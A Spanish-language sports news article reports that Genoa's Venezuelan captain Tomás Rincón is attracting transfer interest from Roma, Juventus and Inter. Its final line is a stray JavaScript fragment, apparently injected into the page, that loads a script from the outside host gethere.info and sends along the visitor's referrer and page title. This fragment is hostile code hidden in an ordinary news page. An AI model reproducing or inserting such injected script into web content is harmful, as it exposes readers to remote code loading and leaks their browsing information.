Deportes

Al criollo Tomás Rincón le llueven las “novias”

Redacción.-  El mercado invernal de fichajes sirve en algunas ocasiones para resolver problemas que se presentan en el primer tramo de la temporada; aunque también se da el caso de que algunos jugadores llaman la atención de los equipos y estos los buscan para repotenciar sus plantillas, ese parece ser el caso de Tomás Rincón.

Convertido en una de las piezas claves del Genoa desde que arribó en verano de 2014, el venezolano es ya una figura y como tal ha llamado la atención de varios equipos. Si en mercado veraniego ya estuvo cerca de salir del conjunto del grifo, ahora para enero se encuentra en la mira de varios conjuntos importantes.

La Roma parece ser el equipo más interesado y el que lleva la delantera, así lo menciona la prensa italiana; sin embargo tal como lo reseña “La Gazzetta dello Sport” el tachirense podría ser objeto de deseo para la Juventus y el Inter de Milan, además del conjunto giallorossi.

El presidente del Genoa, Enrico Preziosi, habría fijado que el precio para dejar salir al capitán de la Vinotinto sería de 10 millones de euros. Cantidad innegociable dada la importancia de Rincón en el club. La Vecchia signora lo buscaría para reforzar el mediocampo con la entrega y la calidad del criollo.

Otro de los interesados es el Inter de Milan, esto según “Tuttosport”. Los nerazzurri le buscan acomodo a Gabriel Barbosa (Gabigol) y el Genoa, que perderá a Leonardo Pavoletti (se iría al Napoli).s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;